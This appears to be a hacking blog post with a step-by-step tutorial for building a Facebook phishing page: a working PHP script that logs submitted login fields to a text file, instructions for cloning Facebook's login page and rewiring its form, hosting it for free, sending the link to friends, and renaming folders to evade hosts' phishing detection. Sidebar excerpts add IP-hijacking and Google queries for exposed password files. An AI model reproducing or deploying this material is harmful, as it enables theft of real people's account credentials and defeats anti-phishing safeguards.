Skip to main content


Hack The Facebook Account With Phishing Method




last week a person requested here to explain how to make a fake login page of Facebook.. So i am giving a lesson here about making fake page of Facebook.


Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.


First i recommend you all to read my previous article on phishing page "How to make a Fake login page manually"  coz here in this post i m not gonna explain all things as i hv done it before.


well, here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files




Step 1. Creating a login.php file>
Open notepad and  paste the following lines there... as save it with name login.php


Code Updated: By mistake i hv missed one line in php file, i hv add that line now. Sorry for inconvenience. 


<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....


check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)


2.2. Now open the htm file with notepad(right click> open with> notepad)...


and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact  type of line as shown in screen shot.... near which you will find a
 tag and method="post" something like that.


2.3. Now replace the url written after action with the name of your php file created in step 1.


Now your fake page is ready....
Save it with name index.html


Step 3: Uploading on a Free Hosting Site:


Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading on http://www.yourfreehosting.net/.
1.  first of all sign up for a free hosting Account.


Note: yourfreehosting.net  is now not available for free, you can create account on http://www.000webhost.com/473091.html .To know how to create account there, check post "How to create a FREE webhosting Account"


2. After creating Account, login there, then go to control pannel> File Manager.


3. Now remove the preexisting index.html file.


4. Now click on upload files and then upload there index.html and login.php




5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"


6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.


Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and  their password will be saved in that file.





Note:- If you got any problem, then describe the problem in detail with the link of ur fake page, so that i can check the problem. But if you dont do so, then plz dont expect any help here.




----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
Update 21/1/2012:  Answer to Frequently asked question
1. Which URL you have to give to your friends or anyone else.
Answer: This is the domain url, that you have ordered/chosen during the time of registration, which is visible for you on almost every page of your free hosting site.  Still if you didnt get, then see the pic below....


Here, you see the URL is up there as i mentioned earlier. Also if you press OPEN, given in front of ur index.html file, then a new page will be open, having the url you need in the URL bar.




2. Photos are not appearing on your Fake page?
Answer: It happens because to detect a phishing page, web hosting sites are tracing the name of folders you are uploading, if they found same name as Facebook or any other site, then they dont let you make that folder/ or just block access of files from that folder. So if you just rename the directory uploaded in step 5, they their system will not recognize it. And after renaming you need to edit the index.html file and give this new name every where in file where you found old name. You can do it simply by opening the index.html file with notepad and replace the old directory name with the new name everywhere in the file.


3. log.txt file is not generating/ log.txt file is not saving passwords.
Answer: You should check all steps carefully, this is not a problem if you do every thing correctly.


4. When i open my fake page's url, iget this error. http://error404.000webhost.com/?
Answer: It means ur page has been detected as a phishing page by the web hosting site, try renaming your folders and  files. (And dont forget to rename the file/folder name in index.html file also.)

Comments

Post a Comment

Popular posts from this blog

Hack Sify,Reliance,Beam Cable - Speed Upto 10 MBPS

I got many requests on how to speed up the internet speed, although some buddy's are using the broadband connection, they wont get the maximum internet speed to browse or to view the online videos... so iam posting this article article specially for them. First Download this ETHERNET Ip Sniffer called   ETHERDETECT Connection-Oriented Packet Sniffer And Protocol Analyzer.by using this tool you can easily speed up net speed. Use the tool to Scan Ip's in your network,Keep Scanning till you get some 200 Ip's .. Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !! NOTE:Please save your Ip address somewhere so as to get back to your original ip ! It will say "Ip conflict" error,keep trying with other Ip's untill you succeed. Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip Download Link~:.. CODE http://adf.ly/9L2dK System Requirements: Processor...
96 comments
Read more

Edit tiles in Windows 8

If you’ve recently installed or upgraded to Windows 8 and have started customizing programs onto its new Start Menu UI, you’ll notice that the program icons are the same old icons placed in an oversized box. You’ll see the program name under it and will be in awe at  how out of place the newly added icons are with the rest   of the Windows 8 theme. We’ve found a handy program to spruce things up by  creating awesome-looking tiles that match the look of Windows 8 apps  on the Start Menu, something like what you see below. And you can get that look using   OblyTile . First thing’s first, the icons you see above are works from users of deviantART. OblyTile only sets up your tiles; you have to provide the icons or images for the tile. But not to worry, we’ll provide you with  a few links which we’ve found to recreate the look and feel  of the screenshot you see above. Getting Started With OblyTile Run OblyTile (no insta...
81 comments
Read more

STEALING PASSWORD WITH GOOGLE HACK

Google is a treasure trove full of important information, especially for  the underground  world. This Potential fact can also be utilized in the data for the username and password stored on a server. If the administrator save important data not in the  complete system authentifikasi folder, then most likely be reached by the google search engine. If data is successfully steal in by the unauthorized person, then the will be in misuse. Here, some google search syntax to crawl the password: 1.  "Login: *" "password =*" filetype: xls  (searching data command to the system files that are stored in  Microsoft Excel ) 2.  allinurl: auth_user_file.txt  (to find files auth_user_file.txt containing password on server). 3.  filetype: xls inurl: "password.xls"  (looking for username and password in ms excel format). This command can change with admin.xls) 4.  intitle: login password  (get link to the  login ...
37 comments
Read more